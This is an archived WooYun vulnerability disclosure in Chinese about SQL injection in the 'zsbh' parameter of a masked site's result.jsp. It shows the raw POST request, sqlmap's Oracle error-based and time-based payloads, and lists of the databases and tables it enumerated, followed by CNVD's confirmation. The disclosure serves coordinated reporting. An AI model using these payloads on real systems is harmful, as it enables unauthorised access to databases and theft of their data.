乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
rt
POST /byzscx/result.jsp HTTP/1.1Content-Length: 94Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: JSESSIONID=CCA85540142478428AC5287E772976F6.server99; voted_time=2015-10-6; CNZZDATA3061020=cnzz_eid%3D1623658040-1444484727-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444484727; looyu_id=c6ebf52265e02063df3ae0402f946a63b0_11267%3A1; looyu_11267=v%3Ac6ebf52265e02063df3ae0402f946a63b0%2Cref%3Ahttp%253A//**.**.**.**/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor; _gscu_169170879=444847250368ki10; _gscs_169170879=44484725azwwiq10|pv:1; _gscbrs_169170879=1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Submit=%b2%e9%20%20%d1%af&xm=1&yzm=1&zsbh=*
zsbh参数存在注入
sqlmap identified the following injection point(s) with a total of 190 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: Submit=%b2%e9 %d1%af&xm=1&yzm=1&zsbh=' AND 8782=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (8782=8782) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'qDKo'='qDKo Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: Submit=%b2%e9 %d1%af&xm=1&yzm=1&zsbh=' AND 3820=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'rYwW'='rYwW---back-end DBMS: Oracle
back-end DBMS: Oracleavailable databases [49]:[*] CTXSYS[*] DAGL[*] DAGLBASE[*] DJYXXGL[*] DYGL[*] ECMS22_APP_USER[*] ECMS_APP_USER[*] HR[*] JOBNET[*] LNJYOA[*] LNJYYJS[*] LNJYZZ[*] LNSZ[*] MARKET[*] MDSYS[*] NEWS[*] NEWSUT[*] OA42[*] ODM[*] ODM_MTR[*] OE[*] OLAPSYS[*] OLDLNJYOA[*] ORDSYS[*] OUTLN[*] PKSTZ[*] PM[*] QS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] QS_OS[*] QS_WS[*] QZDJB[*] RSGL2[*] SCOTT[*] SH[*] SXPX[*] SYS[*] SYSTEM[*] SZLJS[*] TGJH[*] VOTE[*] WKSYS[*] WMSYS[*] XDB[*] XLRZ[*] YCX[*] ZSJY
选取其中一个数据库看看是否可查看表
back-end DBMS: OracleDatabase: LNJYZZ[37 tables]+----------------------+| BAS_BYNF || BAS_BYNF_UNITE || COMBIN1 || CON_BASE || CON_SET || DM_ADMIN || MEMBERS || MOE_TASK_TABLE || PLAN_TABLE || RS_GWGLXX || RS_RYGWGL || RS_RYJBXX || RS_ZZJG || SEARCH_PART || SEARCH_PART_RELATE || SEARCH_TYPE || SERVERMSG || SJZD_FL || SJZD_LB || SJZD_XM || SWBDZBZ_CONDITION || SWBDZBZ_CON_STR || SYSTEM || SYSTEM_ROLE || SYSTEM_ROLE_FUNCTION || TABLE_MSG || TABLE_STRMSG || TMODE || TMODE_STR || T_DM || T_DM_HT || T_DM_TEMP || VALIDATOR_RULES || YXFP || YXFP_PERSON || YX_CERTIFY || YX_XX |+----------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-16 14:24
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无